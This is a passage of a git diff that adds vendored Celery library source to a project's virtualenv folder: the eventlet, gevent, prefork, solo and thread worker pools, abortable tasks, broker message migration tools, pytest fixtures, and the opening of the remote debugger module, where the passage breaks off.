signals.eventlet_pool_postshutdown.send(sender=self) + + def on_apply(self, target, args=None, kwargs=None, callback=None, + accept_callback=None, **_): + target = TaskPool._make_killable_target(target) + self._quick_apply_sig(sender=self, target=target, args=args, kwargs=kwargs,) + greenlet = self._quick_put( + apply_target, + target, args, + kwargs, + callback, + accept_callback, + self.getpid + ) + self._add_to_pool_map(id(greenlet), greenlet) + + def grow(self, n=1): + limit = self.limit + n + self._pool.resize(limit) + self.limit = limit + + def shrink(self, n=1): + limit = self.limit - n + self._pool.resize(limit) + self.limit = limit + + def terminate_job(self, pid, signal=None): + if pid in self._pool_map.keys(): + greenlet = self._pool_map[pid] + greenlet.kill() + greenlet.wait() + + def _get_info(self): + info = super()._get_info() + info.update({ + 'max-concurrency': self.limit, + 'free-threads': self._pool.free(), + 'running-threads': self._pool.running(), + }) + return info + + @staticmethod + def _make_killable_target(target): + def killable_target(*args, **kwargs): + try: + return target(*args, **kwargs) + except GreenletExit: + return (False, None, 
None) + return killable_target + + def _add_to_pool_map(self, pid, greenlet): + self._pool_map[pid] = greenlet + greenlet.link( + TaskPool._cleanup_after_job_finish, + self._pool_map, + pid + ) + + @staticmethod + def _cleanup_after_job_finish(greenlet, pool_map, pid): + del pool_map[pid] diff --git a/env/Lib/site-packages/celery/concurrency/gevent.py b/env/Lib/site-packages/celery/concurrency/gevent.py new file mode 100644 index 00000000..b0ea7e66 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/gevent.py @@ -0,0 +1,122 @@ +"""Gevent execution pool.""" +from time import monotonic + +from kombu.asynchronous import timer as _timer + +from . import base + +try: + from gevent import Timeout +except ImportError: + Timeout = None + +__all__ = ('TaskPool',) + +# pylint: disable=redefined-outer-name +# We cache globals and attribute lookups, so disable this warning. + + +def apply_timeout(target, args=(), kwargs=None, callback=None, + accept_callback=None, pid=None, timeout=None, + timeout_callback=None, Timeout=Timeout, + apply_target=base.apply_target, **rest): + kwargs = {} if not kwargs else kwargs + try: + with Timeout(timeout): + return apply_target(target, args, kwargs, callback, + accept_callback, pid, + propagate=(Timeout,), **rest) + except Timeout: + return timeout_callback(False, timeout) + + +class Timer(_timer.Timer): + + def __init__(self, *args, **kwargs): + from gevent import Greenlet, GreenletExit + + class _Greenlet(Greenlet): + cancel = Greenlet.kill + + self._Greenlet = _Greenlet + self._GreenletExit = GreenletExit + super().__init__(*args, **kwargs) + self._queue = set() + + def _enter(self, eta, priority, entry, **kwargs): + secs = max(eta - monotonic(), 0) + g = self._Greenlet.spawn_later(secs, entry) + self._queue.add(g) + g.link(self._entry_exit) + g.entry = entry + g.eta = eta + g.priority = priority + g.canceled = False + return g + + def _entry_exit(self, g): + try: + g.kill() + finally: + self._queue.discard(g) + + def clear(self): + queue = self._queue + while queue: + try: + queue.pop().kill() + except KeyError: + pass + + @property + def queue(self): + return self._queue + + +class TaskPool(base.BasePool): + """GEvent Pool.""" + + Timer = Timer + + signal_safe = False + is_green = True + task_join_will_block = False + _pool = None + _quick_put = None + + def __init__(self, *args, **kwargs): + from gevent import spawn_raw + from gevent.pool import Pool + self.Pool = Pool + self.spawn_n = spawn_raw + self.timeout = kwargs.get('timeout') + super().__init__(*args, **kwargs) + + def on_start(self): + self._pool = self.Pool(self.limit) + self._quick_put = self._pool.spawn + + def on_stop(self): + if self._pool is not None: + self._pool.join() + + def on_apply(self, target, args=None, kwargs=None, callback=None, + accept_callback=None, timeout=None, + timeout_callback=None, apply_target=base.apply_target, **_): + timeout = self.timeout if timeout is None else timeout + return self._quick_put(apply_timeout if timeout else apply_target, + target, args, kwargs, callback, accept_callback, + timeout=timeout, + timeout_callback=timeout_callback) + + def grow(self, n=1): + self._pool._semaphore.counter += n + self._pool.size += n + + def shrink(self, n=1): + self._pool._semaphore.counter -= n + self._pool.size -= n + + @property + def num_processes(self): + return len(self._pool) diff --git a/env/Lib/site-packages/celery/concurrency/prefork.py b/env/Lib/site-packages/celery/concurrency/prefork.py new file mode 100644 index 00000000..b163328d --- /dev/null +++ 
b/env/Lib/site-packages/celery/concurrency/prefork.py @@ -0,0 +1,172 @@ +"""Prefork execution pool. + +Pool implementation using :mod:`multiprocessing`. +""" +import os + +from billiard import forking_enable +from billiard.common import REMAP_SIGTERM, TERM_SIGNAME +from billiard.pool import CLOSE, RUN +from billiard.pool import Pool as BlockingPool + +from celery import platforms, signals +from celery._state import _set_task_join_will_block, set_default_app +from celery.app import trace +from celery.concurrency.base import BasePool +from celery.utils.functional import noop +from celery.utils.log import get_logger + +from .asynpool import AsynPool + +__all__ = ('TaskPool', 'process_initializer', 'process_destructor') + +#: List of signals to reset when a child process starts. +WORKER_SIGRESET = { + 'SIGTERM', 'SIGHUP', 'SIGTTIN', 'SIGTTOU', 'SIGUSR1', +} + +#: List of signals to ignore when a child process starts. +if REMAP_SIGTERM: + WORKER_SIGIGNORE = {'SIGINT', TERM_SIGNAME} +else: + WORKER_SIGIGNORE = {'SIGINT'} + +logger = get_logger(__name__) +warning, debug = logger.warning, logger.debug + + +def process_initializer(app, hostname): + """Pool child process initializer. + + Initialize the child pool process to ensure the correct + app instance is used and things like logging works. + """ + # Each running worker gets SIGKILL by OS when main process exits. + platforms.set_pdeathsig('SIGKILL') + _set_task_join_will_block(True) + platforms.signals.reset(*WORKER_SIGRESET) + platforms.signals.ignore(*WORKER_SIGIGNORE) + platforms.set_mp_process_title('celeryd', hostname=hostname) + # This is for Windows and other platforms not supporting + # fork(). Note that init_worker makes sure it's only + # run once per process. + app.loader.init_worker() + app.loader.init_worker_process() + logfile = os.environ.get('CELERY_LOG_FILE') or None + if logfile and '%i' in logfile.lower(): + # logfile path will differ so need to set up logging again. + app.log.already_setup = False + app.log.setup(int(os.environ.get('CELERY_LOG_LEVEL', 0) or 0), + logfile, + bool(os.environ.get('CELERY_LOG_REDIRECT', False)), + str(os.environ.get('CELERY_LOG_REDIRECT_LEVEL')), + hostname=hostname) + if os.environ.get('FORKED_BY_MULTIPROCESSING'): + # pool did execv after fork + trace.setup_worker_optimizations(app, hostname) + else: + app.set_current() + set_default_app(app) + app.finalize() + trace._tasks = app._tasks # enables fast_trace_task optimization. + # rebuild execution handler for all tasks. + from celery.app.trace import build_tracer + for name, task in app.tasks.items(): + task.__trace__ = build_tracer(name, task, app.loader, hostname, + app=app) + from celery.worker import state as worker_state + worker_state.reset_state() + signals.worker_process_init.send(sender=None) + + +def process_destructor(pid, exitcode): + """Pool child process destructor. + + Dispatch the :signal:`worker_process_shutdown` signal. 
+ """ + signals.worker_process_shutdown.send( + sender=None, pid=pid, exitcode=exitcode, + ) + + +class TaskPool(BasePool): + """Multiprocessing Pool implementation.""" + + Pool = AsynPool + BlockingPool = BlockingPool + + uses_semaphore = True + write_stats = None + + def on_start(self): + forking_enable(self.forking_enable) + Pool = (self.BlockingPool if self.options.get('threads', True) + else self.Pool) + proc_alive_timeout = ( + self.app.conf.worker_proc_alive_timeout if self.app + else None + ) + P = self._pool = Pool(processes=self.limit, + initializer=process_initializer, + on_process_exit=process_destructor, + enable_timeouts=True, + synack=False, + proc_alive_timeout=proc_alive_timeout, + **self.options) + + # Create proxy methods + self.on_apply = P.apply_async + self.maintain_pool = P.maintain_pool + self.terminate_job = P.terminate_job + self.grow = P.grow + self.shrink = P.shrink + self.flush = getattr(P, 'flush', None) # FIXME add to billiard + + def restart(self): + self._pool.restart() + self._pool.apply_async(noop) + + def did_start_ok(self): + return self._pool.did_start_ok() + + def register_with_event_loop(self, loop): + try: + reg = self._pool.register_with_event_loop + except AttributeError: + return + return reg(loop) + + def on_stop(self): + """Gracefully stop the pool.""" + if self._pool is not None and self._pool._state in (RUN, CLOSE): + self._pool.close() + self._pool.join() + self._pool = None + + def on_terminate(self): + """Force terminate the pool.""" + if self._pool is not None: + self._pool.terminate() + self._pool = None + + def on_close(self): + if self._pool is not None and self._pool._state == RUN: + self._pool.close() + + def _get_info(self): + write_stats = getattr(self._pool, 'human_write_stats', None) + info = super()._get_info() + info.update({ + 'max-concurrency': self.limit, + 'processes': [p.pid for p in self._pool._pool], + 'max-tasks-per-child': self._pool._maxtasksperchild or 'N/A', + 'put-guarded-by-semaphore': self.putlocks, + 'timeouts': (self._pool.soft_timeout or 0, + self._pool.timeout or 0), + 'writes': write_stats() if write_stats is not None else 'N/A', + }) + return info + + @property + def num_processes(self): + return self._pool._processes diff --git a/env/Lib/site-packages/celery/concurrency/solo.py b/env/Lib/site-packages/celery/concurrency/solo.py new file mode 100644 index 00000000..e7e9c7f3 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/solo.py @@ -0,0 +1,31 @@ +"""Single-threaded execution pool.""" +import os + +from celery import signals + +from .base import BasePool, apply_target + +__all__ = ('TaskPool',) + + +class TaskPool(BasePool): + """Solo task pool (blocking, inline, fast).""" + + body_can_be_buffer = True + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.on_apply = apply_target + self.limit = 1 + signals.worker_process_init.send(sender=None) + + def _get_info(self): + info = super()._get_info() + info.update({ + 'max-concurrency': 1, + 'processes': [os.getpid()], + 'max-tasks-per-child': None, + 'put-guarded-by-semaphore': True, + 'timeouts': (), + }) + return info diff --git a/env/Lib/site-packages/celery/concurrency/thread.py b/env/Lib/site-packages/celery/concurrency/thread.py new file mode 100644 index 00000000..bcc7c116 --- /dev/null +++ b/env/Lib/site-packages/celery/concurrency/thread.py @@ -0,0 +1,64 @@ +"""Thread execution pool.""" +from __future__ import annotations + +from concurrent.futures import Future, ThreadPoolExecutor, wait +from typing import 
TYPE_CHECKING, Any, Callable + +from .base import BasePool, apply_target + +__all__ = ('TaskPool',) + +if TYPE_CHECKING: + from typing import TypedDict + + PoolInfo = TypedDict('PoolInfo', {'max-concurrency': int, 'threads': int}) + + # `TargetFunction` should be a Protocol that represents fast_trace_task and + # trace_task_ret. + TargetFunction = Callable[..., Any] + + +class ApplyResult: + def __init__(self, future: Future) -> None: + self.f = future + self.get = self.f.result + + def wait(self, timeout: float | None = None) -> None: + wait([self.f], timeout) + + +class TaskPool(BasePool): + """Thread Task Pool.""" + limit: int + + body_can_be_buffer = True + signal_safe = False + + def __init__(self, *args: Any, **kwargs: Any) -> None: + super().__init__(*args, **kwargs) + self.executor = ThreadPoolExecutor(max_workers=self.limit) + + def on_stop(self) -> None: + self.executor.shutdown() + super().on_stop() + + def on_apply( + self, + target: TargetFunction, + args: tuple[Any, ...] | None = None, + kwargs: dict[str, Any] | None = None, + callback: Callable[..., Any] | None = None, + accept_callback: Callable[..., Any] | None = None, + **_: Any + ) -> ApplyResult: + f = self.executor.submit(apply_target, target, args, kwargs, + callback, accept_callback) + return ApplyResult(f) + + def _get_info(self) -> PoolInfo: + info = super()._get_info() + info.update({ + 'max-concurrency': self.limit, + 'threads': len(self.executor._threads) + }) + return info diff --git a/env/Lib/site-packages/celery/contrib/__init__.py b/env/Lib/site-packages/celery/contrib/__init__.py new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/celery/contrib/abortable.py b/env/Lib/site-packages/celery/contrib/abortable.py new file mode 100644 index 00000000..8cb164d7 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/abortable.py @@ -0,0 +1,165 @@ +"""Abortable Tasks. + +Abortable tasks overview +========================= + +For long-running :class:`Task`'s, it can be desirable to support +aborting during execution. Of course, these tasks should be built to +support abortion specifically. + +The :class:`AbortableTask` serves as a base class for all :class:`Task` +objects that should support abortion by producers. + +* Producers may invoke the :meth:`abort` method on + :class:`AbortableAsyncResult` instances, to request abortion. + +* Consumers (workers) should periodically check (and honor!) the + :meth:`is_aborted` method at controlled points in their task's + :meth:`run` method. The more often, the better. + +The necessary intermediate communication is dealt with by the +:class:`AbortableTask` implementation. + +Usage example +------------- + +In the consumer: + +.. code-block:: python + + from celery.contrib.abortable import AbortableTask + from celery.utils.log import get_task_logger + + from proj.celery import app + + logger = get_logger(__name__) + + @app.task(bind=True, base=AbortableTask) + def long_running_task(self): + results = [] + for i in range(100): + # check after every 5 iterations... + # (or alternatively, check when some timer is due) + if not i % 5: + if self.is_aborted(): + # respect aborted state, and terminate gracefully. + logger.warning('Task aborted') + return + value = do_something_expensive(i) + results.append(y) + logger.info('Task complete') + return results + +In the producer: + +.. 
code-block:: python + + import time + + from proj.tasks import MyLongRunningTask + + def myview(request): + # result is of type AbortableAsyncResult + result = long_running_task.delay() + + # abort the task after 10 seconds + time.sleep(10) + result.abort() + +After the `result.abort()` call, the task execution isn't +aborted immediately. In fact, it's not guaranteed to abort at all. +Keep checking `result.state` status, or call `result.get(timeout=)` to +have it block until the task is finished. + +.. note:: + + In order to abort tasks, there needs to be communication between the + producer and the consumer. This is currently implemented through the + database backend. Therefore, this class will only work with the + database backends. +""" +from celery import Task +from celery.result import AsyncResult + +__all__ = ('AbortableAsyncResult', 'AbortableTask') + + +""" +Task States +----------- + +.. state:: ABORTED + +ABORTED +~~~~~~~ + +Task is aborted (typically by the producer) and should be +aborted as soon as possible. + +""" +ABORTED = 'ABORTED' + + +class AbortableAsyncResult(AsyncResult): + """Represents an abortable result. + + Specifically, this gives the `AsyncResult` a :meth:`abort()` method, + that sets the state of the underlying Task to `'ABORTED'`. + """ + + def is_aborted(self): + """Return :const:`True` if the task is (being) aborted.""" + return self.state == ABORTED + + def abort(self): + """Set the state of the task to :const:`ABORTED`. + + Abortable tasks monitor their state at regular intervals and + terminate execution if so. + + Warning: + Be aware that invoking this method does not guarantee when the + task will be aborted (or even if the task will be aborted at all). + """ + # TODO: store_result requires all four arguments to be set, + # but only state should be updated here + return self.backend.store_result(self.id, result=None, + state=ABORTED, traceback=None) + + +class AbortableTask(Task): + """Task that can be aborted. + + This serves as a base class for all :class:`Task`'s + that support aborting during execution. + + All subclasses of :class:`AbortableTask` must call the + :meth:`is_aborted` method periodically and act accordingly when + the call evaluates to :const:`True`. + """ + + abstract = True + + def AsyncResult(self, task_id): + """Return the accompanying AbortableAsyncResult instance.""" + return AbortableAsyncResult(task_id, backend=self.backend) + + def is_aborted(self, **kwargs): + """Return true if task is aborted. + + Checks against the backend whether this + :class:`AbortableAsyncResult` is :const:`ABORTED`. + + Always return :const:`False` in case the `task_id` parameter + refers to a regular (non-abortable) :class:`Task`. + + Be aware that invoking this method will cause a hit in the + backend (for example a database query), so find a good balance + between calling it regularly (for responsiveness), but not too + often (for performance). 
+ """ + task_id = kwargs.get('task_id', self.request.id) + result = self.AsyncResult(task_id) + if not isinstance(result, AbortableAsyncResult): + return False + return result.is_aborted() diff --git a/env/Lib/site-packages/celery/contrib/migrate.py b/env/Lib/site-packages/celery/contrib/migrate.py new file mode 100644 index 00000000..dd778017 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/migrate.py @@ -0,0 +1,416 @@ +"""Message migration tools (Broker <-> Broker).""" +import socket +from functools import partial +from itertools import cycle, islice + +from kombu import Queue, eventloop +from kombu.common import maybe_declare +from kombu.utils.encoding import ensure_bytes + +from celery.app import app_or_default +from celery.utils.nodenames import worker_direct +from celery.utils.text import str_to_list + +__all__ = ( + 'StopFiltering', 'State', 'republish', 'migrate_task', + 'migrate_tasks', 'move', 'task_id_eq', 'task_id_in', + 'start_filter', 'move_task_by_id', 'move_by_idmap', + 'move_by_taskmap', 'move_direct', 'move_direct_by_id', +) + +MOVING_PROGRESS_FMT = """\ +Moving task {state.filtered}/{state.strtotal}: \ +{body[task]}[{body[id]}]\ +""" + + +class StopFiltering(Exception): + """Semi-predicate used to signal filter stop.""" + + +class State: + """Migration progress state.""" + + count = 0 + filtered = 0 + total_apx = 0 + + @property + def strtotal(self): + if not self.total_apx: + return '?' + return str(self.total_apx) + + def __repr__(self): + if self.filtered: + return f'^{self.filtered}' + return f'{self.count}/{self.strtotal}' + + +def republish(producer, message, exchange=None, routing_key=None, + remove_props=None): + """Republish message.""" + if not remove_props: + remove_props = ['application_headers', 'content_type', + 'content_encoding', 'headers'] + body = ensure_bytes(message.body) # use raw message body. + info, headers, props = (message.delivery_info, + message.headers, message.properties) + exchange = info['exchange'] if exchange is None else exchange + routing_key = info['routing_key'] if routing_key is None else routing_key + ctype, enc = message.content_type, message.content_encoding + # remove compression header, as this will be inserted again + # when the message is recompressed. 
+ compression = headers.pop('compression', None) + + expiration = props.pop('expiration', None) + # ensure expiration is a float + expiration = float(expiration) if expiration is not None else None + + for key in remove_props: + props.pop(key, None) + + producer.publish(ensure_bytes(body), exchange=exchange, + routing_key=routing_key, compression=compression, + headers=headers, content_type=ctype, + content_encoding=enc, expiration=expiration, + **props) + + +def migrate_task(producer, body_, message, queues=None): + """Migrate single task message.""" + info = message.delivery_info + queues = {} if queues is None else queues + republish(producer, message, + exchange=queues.get(info['exchange']), + routing_key=queues.get(info['routing_key'])) + + +def filter_callback(callback, tasks): + + def filtered(body, message): + if tasks and body['task'] not in tasks: + return + + return callback(body, message) + return filtered + + +def migrate_tasks(source, dest, migrate=migrate_task, app=None, + queues=None, **kwargs): + """Migrate tasks from one broker to another.""" + app = app_or_default(app) + queues = prepare_queues(queues) + producer = app.amqp.Producer(dest, auto_declare=False) + migrate = partial(migrate, producer, queues=queues) + + def on_declare_queue(queue): + new_queue = queue(producer.channel) + new_queue.name = queues.get(queue.name, queue.name) + if new_queue.routing_key == queue.name: + new_queue.routing_key = queues.get(queue.name, + new_queue.routing_key) + if new_queue.exchange.name == queue.name: + new_queue.exchange.name = queues.get(queue.name, queue.name) + new_queue.declare() + + return start_filter(app, source, migrate, queues=queues, + on_declare_queue=on_declare_queue, **kwargs) + + +def _maybe_queue(app, q): + if isinstance(q, str): + return app.amqp.queues[q] + return q + + +def move(predicate, connection=None, exchange=None, routing_key=None, + source=None, app=None, callback=None, limit=None, transform=None, + **kwargs): + """Find tasks by filtering them and move the tasks to a new queue. + + Arguments: + predicate (Callable): Filter function used to decide the messages + to move. Must accept the standard signature of ``(body, message)`` + used by Kombu consumer callbacks. If the predicate wants the + message to be moved it must return either: + + 1) a tuple of ``(exchange, routing_key)``, or + + 2) a :class:`~kombu.entity.Queue` instance, or + + 3) any other true value means the specified + ``exchange`` and ``routing_key`` arguments will be used. + connection (kombu.Connection): Custom connection to use. + source: List[Union[str, kombu.Queue]]: Optional list of source + queues to use instead of the default (queues + in :setting:`task_queues`). This list can also contain + :class:`~kombu.entity.Queue` instances. + exchange (str, kombu.Exchange): Default destination exchange. + routing_key (str): Default destination routing key. + limit (int): Limit number of messages to filter. + callback (Callable): Callback called after message moved, + with signature ``(state, body, message)``. + transform (Callable): Optional function to transform the return + value (destination) of the filter function. + + Also supports the same keyword arguments as :func:`start_filter`. + + To demonstrate, the :func:`move_task_by_id` operation can be implemented + like this: + + .. code-block:: python + + def is_wanted_task(body, message): + if body['id'] == wanted_id: + return Queue('foo', exchange=Exchange('foo'), + routing_key='foo') + + move(is_wanted_task) + + or with a transform: + + .. 
code-block:: python + + def transform(value): + if isinstance(value, str): + return Queue(value, Exchange(value), value) + return value + + move(is_wanted_task, transform=transform) + + Note: + The predicate may also return a tuple of ``(exchange, routing_key)`` + to specify the destination to where the task should be moved, + or a :class:`~kombu.entity.Queue` instance. + Any other true value means that the task will be moved to the + default exchange/routing_key. + """ + app = app_or_default(app) + queues = [_maybe_queue(app, queue) for queue in source or []] or None + with app.connection_or_acquire(connection, pool=False) as conn: + producer = app.amqp.Producer(conn) + state = State() + + def on_task(body, message): + ret = predicate(body, message) + if ret: + if transform: + ret = transform(ret) + if isinstance(ret, Queue): + maybe_declare(ret, conn.default_channel) + ex, rk = ret.exchange.name, ret.routing_key + else: + ex, rk = expand_dest(ret, exchange, routing_key) + republish(producer, message, + exchange=ex, routing_key=rk) + message.ack() + + state.filtered += 1 + if callback: + callback(state, body, message) + if limit and state.filtered >= limit: + raise StopFiltering() + + return start_filter(app, conn, on_task, consume_from=queues, **kwargs) + + +def expand_dest(ret, exchange, routing_key): + try: + ex, rk = ret + except (TypeError, ValueError): + ex, rk = exchange, routing_key + return ex, rk + + +def task_id_eq(task_id, body, message): + """Return true if task id equals task_id'.""" + return body['id'] == task_id + + +def task_id_in(ids, body, message): + """Return true if task id is member of set ids'.""" + return body['id'] in ids + + +def prepare_queues(queues): + if isinstance(queues, str): + queues = queues.split(',') + if isinstance(queues, list): + queues = dict(tuple(islice(cycle(q.split(':')), None, 2)) + for q in queues) + if queues is None: + queues = {} + return queues + + +class Filterer: + + def __init__(self, app, conn, filter, + limit=None, timeout=1.0, + ack_messages=False, tasks=None, queues=None, + callback=None, forever=False, on_declare_queue=None, + consume_from=None, state=None, accept=None, **kwargs): + self.app = app + self.conn = conn + self.filter = filter + self.limit = limit + self.timeout = timeout + self.ack_messages = ack_messages + self.tasks = set(str_to_list(tasks) or []) + self.queues = prepare_queues(queues) + self.callback = callback + self.forever = forever + self.on_declare_queue = on_declare_queue + self.consume_from = [ + _maybe_queue(self.app, q) + for q in consume_from or list(self.queues) + ] + self.state = state or State() + self.accept = accept + + def start(self): + # start migrating messages. 
+ with self.prepare_consumer(self.create_consumer()): + try: + for _ in eventloop(self.conn, # pragma: no cover + timeout=self.timeout, + ignore_timeouts=self.forever): + pass + except socket.timeout: + pass + except StopFiltering: + pass + return self.state + + def update_state(self, body, message): + self.state.count += 1 + if self.limit and self.state.count >= self.limit: + raise StopFiltering() + + def ack_message(self, body, message): + message.ack() + + def create_consumer(self): + return self.app.amqp.TaskConsumer( + self.conn, + queues=self.consume_from, + accept=self.accept, + ) + + def prepare_consumer(self, consumer): + filter = self.filter + update_state = self.update_state + ack_message = self.ack_message + if self.tasks: + filter = filter_callback(filter, self.tasks) + update_state = filter_callback(update_state, self.tasks) + ack_message = filter_callback(ack_message, self.tasks) + consumer.register_callback(filter) + consumer.register_callback(update_state) + if self.ack_messages: + consumer.register_callback(self.ack_message) + if self.callback is not None: + callback = partial(self.callback, self.state) + if self.tasks: + callback = filter_callback(callback, self.tasks) + consumer.register_callback(callback) + self.declare_queues(consumer) + return consumer + + def declare_queues(self, consumer): + # declare all queues on the new broker. + for queue in consumer.queues: + if self.queues and queue.name not in self.queues: + continue + if self.on_declare_queue is not None: + self.on_declare_queue(queue) + try: + _, mcount, _ = queue( + consumer.channel).queue_declare(passive=True) + if mcount: + self.state.total_apx += mcount + except self.conn.channel_errors: + pass + + +def start_filter(app, conn, filter, limit=None, timeout=1.0, + ack_messages=False, tasks=None, queues=None, + callback=None, forever=False, on_declare_queue=None, + consume_from=None, state=None, accept=None, **kwargs): + """Filter tasks.""" + return Filterer( + app, conn, filter, + limit=limit, + timeout=timeout, + ack_messages=ack_messages, + tasks=tasks, + queues=queues, + callback=callback, + forever=forever, + on_declare_queue=on_declare_queue, + consume_from=consume_from, + state=state, + accept=accept, + **kwargs).start() + + +def move_task_by_id(task_id, dest, **kwargs): + """Find a task by id and move it to another queue. + + Arguments: + task_id (str): Id of task to find and move. + dest: (str, kombu.Queue): Destination queue. + transform (Callable): Optional function to transform the return + value (destination) of the filter function. + **kwargs (Any): Also supports the same keyword + arguments as :func:`move`. + """ + return move_by_idmap({task_id: dest}, **kwargs) + + +def move_by_idmap(map, **kwargs): + """Move tasks by matching from a ``task_id: queue`` mapping. + + Where ``queue`` is a queue to move the task to. + + Example: + >>> move_by_idmap({ + ... '5bee6e82-f4ac-468e-bd3d-13e8600250bc': Queue('name'), + ... 'ada8652d-aef3-466b-abd2-becdaf1b82b3': Queue('name'), + ... '3a2b140d-7db1-41ba-ac90-c36a0ef4ab1f': Queue('name')}, + ... queues=['hipri']) + """ + def task_id_in_map(body, message): + return map.get(message.properties['correlation_id']) + + # adding the limit means that we don't have to consume any more + # when we've found everything. + return move(task_id_in_map, limit=len(map), **kwargs) + + +def move_by_taskmap(map, **kwargs): + """Move tasks by matching from a ``task_name: queue`` mapping. + + ``queue`` is the queue to move the task to. 
+ + Example: + >>> move_by_taskmap({ + ... 'tasks.add': Queue('name'), + ... 'tasks.mul': Queue('name'), + ... }) + """ + def task_name_in_map(body, message): + return map.get(body['task']) # <- name of task + + return move(task_name_in_map, **kwargs) + + +def filter_status(state, body, message, **kwargs): + print(MOVING_PROGRESS_FMT.format(state=state, body=body, **kwargs)) + + +move_direct = partial(move, transform=worker_direct) +move_direct_by_id = partial(move_task_by_id, transform=worker_direct) +move_direct_by_idmap = partial(move_by_idmap, transform=worker_direct) +move_direct_by_taskmap = partial(move_by_taskmap, transform=worker_direct) diff --git a/env/Lib/site-packages/celery/contrib/pytest.py b/env/Lib/site-packages/celery/contrib/pytest.py new file mode 100644 index 00000000..d1f8279f --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/pytest.py @@ -0,0 +1,216 @@ +"""Fixtures and testing utilities for :pypi:`pytest `.""" +import os +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any, Mapping, Sequence, Union # noqa + +import pytest + +if TYPE_CHECKING: + from celery import Celery + + from ..worker import WorkController +else: + Celery = WorkController = object + + +NO_WORKER = os.environ.get('NO_WORKER') + +# pylint: disable=redefined-outer-name +# Well, they're called fixtures.... + + +def pytest_configure(config): + """Register additional pytest configuration.""" + # add the pytest.mark.celery() marker registration to the pytest.ini [markers] section + # this prevents pytest 4.5 and newer from issuing a warning about an unknown marker + # and shows helpful marker documentation when running pytest --markers. + config.addinivalue_line( + "markers", "celery(**overrides): override celery configuration for a test case" + ) + + +@contextmanager +def _create_app(enable_logging=False, + use_trap=False, + parameters=None, + **config): + # type: (Any, Any, Any, **Any) -> Celery + """Utility context used to setup Celery app for pytest fixtures.""" + + from .testing.app import TestApp, setup_default_app + + parameters = {} if not parameters else parameters + test_app = TestApp( + set_as_current=False, + enable_logging=enable_logging, + config=config, + **parameters + ) + with setup_default_app(test_app, use_trap=use_trap): + yield test_app + + +@pytest.fixture(scope='session') +def use_celery_app_trap(): + # type: () -> bool + """You can override this fixture to enable the app trap. + + The app trap raises an exception whenever something attempts + to use the current or default apps. + """ + return False + + +@pytest.fixture(scope='session') +def celery_session_app(request, + celery_config, + celery_parameters, + celery_enable_logging, + use_celery_app_trap): + # type: (Any, Any, Any, Any, Any) -> Celery + """Session Fixture: Return app for session fixtures.""" + mark = request.node.get_closest_marker('celery') + config = dict(celery_config, **mark.kwargs if mark else {}) + with _create_app(enable_logging=celery_enable_logging, + use_trap=use_celery_app_trap, + parameters=celery_parameters, + **config) as app: + if not use_celery_app_trap: + app.set_default() + app.set_current() + yield app + + +@pytest.fixture(scope='session') +def celery_session_worker( + request, # type: Any + celery_session_app, # type: Celery + celery_includes, # type: Sequence[str] + celery_class_tasks, # type: str + celery_worker_pool, # type: Any + celery_worker_parameters, # type: Mapping[str, Any] +): + # type: (...) 
-> WorkController + """Session Fixture: Start worker that lives throughout test suite.""" + from .testing import worker + + if not NO_WORKER: + for module in celery_includes: + celery_session_app.loader.import_task_module(module) + for class_task in celery_class_tasks: + celery_session_app.register_task(class_task) + with worker.start_worker(celery_session_app, + pool=celery_worker_pool, + **celery_worker_parameters) as w: + yield w + + +@pytest.fixture(scope='session') +def celery_enable_logging(): + # type: () -> bool + """You can override this fixture to enable logging.""" + return False + + +@pytest.fixture(scope='session') +def celery_includes(): + # type: () -> Sequence[str] + """You can override this include modules when a worker start. + + You can have this return a list of module names to import, + these can be task modules, modules registering signals, and so on. + """ + return () + + +@pytest.fixture(scope='session') +def celery_worker_pool(): + # type: () -> Union[str, Any] + """You can override this fixture to set the worker pool. + + The "solo" pool is used by default, but you can set this to + return e.g. "prefork". + """ + return 'solo' + + +@pytest.fixture(scope='session') +def celery_config(): + # type: () -> Mapping[str, Any] + """Redefine this fixture to configure the test Celery app. + + The config returned by your fixture will then be used + to configure the :func:`celery_app` fixture. + """ + return {} + + +@pytest.fixture(scope='session') +def celery_parameters(): + # type: () -> Mapping[str, Any] + """Redefine this fixture to change the init parameters of test Celery app. + + The dict returned by your fixture will then be used + as parameters when instantiating :class:`~celery.Celery`. + """ + return {} + + +@pytest.fixture(scope='session') +def celery_worker_parameters(): + # type: () -> Mapping[str, Any] + """Redefine this fixture to change the init parameters of Celery workers. + + This can be used e. g. to define queues the worker will consume tasks from. + + The dict returned by your fixture will then be used + as parameters when instantiating :class:`~celery.worker.WorkController`. 
+ """ + return {} + + +@pytest.fixture() +def celery_app(request, + celery_config, + celery_parameters, + celery_enable_logging, + use_celery_app_trap): + """Fixture creating a Celery application instance.""" + mark = request.node.get_closest_marker('celery') + config = dict(celery_config, **mark.kwargs if mark else {}) + with _create_app(enable_logging=celery_enable_logging, + use_trap=use_celery_app_trap, + parameters=celery_parameters, + **config) as app: + yield app + + +@pytest.fixture(scope='session') +def celery_class_tasks(): + """Redefine this fixture to register tasks with the test Celery app.""" + return [] + + +@pytest.fixture() +def celery_worker(request, + celery_app, + celery_includes, + celery_worker_pool, + celery_worker_parameters): + # type: (Any, Celery, Sequence[str], str, Any) -> WorkController + """Fixture: Start worker in a thread, stop it when the test returns.""" + from .testing import worker + + if not NO_WORKER: + for module in celery_includes: + celery_app.loader.import_task_module(module) + with worker.start_worker(celery_app, + pool=celery_worker_pool, + **celery_worker_parameters) as w: + yield w + + +@pytest.fixture() +def depends_on_current_app(celery_app): + """Fixture that sets app as current.""" + celery_app.set_current() diff --git a/env/Lib/site-packages/celery/contrib/rdb.py b/env/Lib/site-packages/celery/contrib/rdb.py new file mode 100644 index 00000000..8ac8f701 --- /dev/null +++ b/env/Lib/site-packages/celery/contrib/rdb.py @@ -0,0 +1,187 @@ +"""Remote Debugger. + +Introduction +============ + +This is a remote debugger for Celery tasks running in multiprocessing +pool workers. Inspired by a lost post on dzone.com. + +Usage +----- + +.. code-block:: python + + from celery.contrib import rdb + from celery import task + + @task() + def add(x, y): + result = x + y + rdb.set_trace() + return result + +Environment Variables +===================== + +.. envvar:: CELERY_RDB_HOST + +``CELERY_RDB_HOST`` +------------------- + + Hostname to bind 